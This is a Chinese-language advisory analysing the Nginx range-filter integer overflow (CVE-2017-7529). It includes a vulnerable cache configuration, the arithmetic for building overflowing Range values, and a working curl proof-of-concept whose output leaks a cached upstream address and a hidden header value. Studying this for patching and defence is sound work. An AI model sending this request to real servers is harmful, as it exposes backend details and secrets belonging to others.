Nginx range过滤器整形溢出漏洞 (CVE–2017–7529)预警分析,cve7529
Nginx range过滤器整形溢出漏洞 (CVE–2017–7529)预警分析,cve7529
Nginx range过滤器整形溢出漏洞 (CVE–2017–7529)预警分析
1. 漏洞说明
当使用nginx标准模块时,这允许攻击者如果从缓存返回响应,则获取缓存文件头,黑客可以通过缓存文件头获取包含IP地址的后端服务器或其他敏感信息,从而导致信息泄露。
2. 重现漏洞
重现条件
- Nginx版本:0.5.6 - 1.13.2
- 开启缓存功能
- 请求头中的Range按照一定规则整型溢出
重现的过程
- nginx配置文件如下:
http {
proxy_cache_path /home/nginx/tmp_cache levels=1:2 keys_zone=cache_one:200m inactive=3d max_size=30g;
server {
listen 80;
location /proxy/ {
proxy_pass http://127.0.0.1:8001/index.html;
proxy_cache cache_one;
add_header X-Proxy-Cache $upstream_cache_status;
proxy_hide_header x-nos-passwd;
proxy_cache_valid 200 302 24h;
proxy_cache_valid any 5m;
expires 90d;
}
}
}- 确定文件长度并cache文件
$ curl "127.0.0.1/proxy/" -I
HTTP/1.1 200 OK
Server: nginx/1.7.10
Date: Wed, 19 Jul 2017 06:07:49 GMT
Content-Type: text/html
Content-Length: 558
Connection: keep-alive
Last-Modified: Tue, 02 May 2017 02:31:11 GMT
ETag: "5907ef6f-22e"
Expires: Tue, 17 Oct 2017 06:07:49 GMT
Cache-Control: max-age=7776000
X-Proxy-Cache: MISS
Accept-Ranges: bytes- 构造溢出的Range
1. 文件长度是558
2. 构造第一段的range为-958,因为958-558=400,即获取cache文件偏移之前的400字节,包含cache的头部内容
3. 第二段的range为0x8000000000000000-958=9223372036854774850,取负数即可- 重现bug
$ curl -v "127.0.0.1/proxy/" -r -958,-9223372036854774850
* About to connect() to 127.0.0.1 port 80 (#0)
* Trying 127.0.0.1...
* Connected to 127.0.0.1 (127.0.0.1) port 80 (#0)
> GET /proxy/ HTTP/1.1
> Range: bytes=-958,-9223372036854774850
> User-Agent: curl/7.29.0
> Host: 127.0.0.1
> Accept: */*
>
< HTTP/1.1 206 Partial Content
< Server: nginx/1.7.10
< Date: Wed, 19 Jul 2017 06:23:14 GMT
< Content-Type: multipart/byteranges; boundary=00000000000000000569
< Connection: keep-alive
< Last-Modified: Tue, 02 May 2017 02:31:11 GMT
< ETag: "5907ef6f-22e"
< Expires: Tue, 17 Oct 2017 06:23:14 GMT
< Cache-Control: max-age=7776000
< X-Proxy-Cache: HIT
* no chunk, no close, no size. Assume close to signal end
<
--00000000000000000569
Content-Type: text/html
Content-Range: bytes -400-557/558
22e"
KEY: http://127.0.0.1:8001/index.html
HTTP/1.1 200 OK
Server: openresty/1.11.2.2
Date: Wed, 19 Jul 2017 06:07:49 GMT
Content-Type: text/html
Content-Length: 558
Last-Modified: Tue, 02 May 2017 02:31:11 GMT
Connection: close
ETag: "5907ef6f-22e"
x-nos-passwd: chenjianfei
Accept-Ranges: bytes
<!DOCTYPE html>
<html>
<head>
<title>Welcome to OpenResty!</title>
<style>
body {
width: 35em;
margin: 0 auto;
font-family: Tahoma, Verdana, Arial, sans-serif;
}
</style>
</head>
<body>
<h1>Welcome to OpenResty!</h1>
<p>If you see this page, the OpenResty web platform is successfully installed and
working. Further configuration is required.</p>
<p>For online documentation and support please refer to
<a href="https://openresty.org/">openresty.org</a>.<br/>
<p><em>Thank you for flying OpenResty.</em></p>
</body>
</html>
--00000000000000000569
Content-Type: text/html
Content-Range: bytes -9223372036854774292-557/558
* Closing connection 03. 漏洞影响
可以发现上面的请求暴露了这些信息:
- upstream真实的ip和端口(KEY: http://127.0.0.1:8001/index.html)
- upstream返回的头部信息(x-nos-passwd: chenjianfei 等)
主要影响开启cache的相应版本的nginx。
ref:
- http://4hou.win/wordpress/?p=4769
- https://bbs.aliyun.com/read/321548.html
评论暂时关闭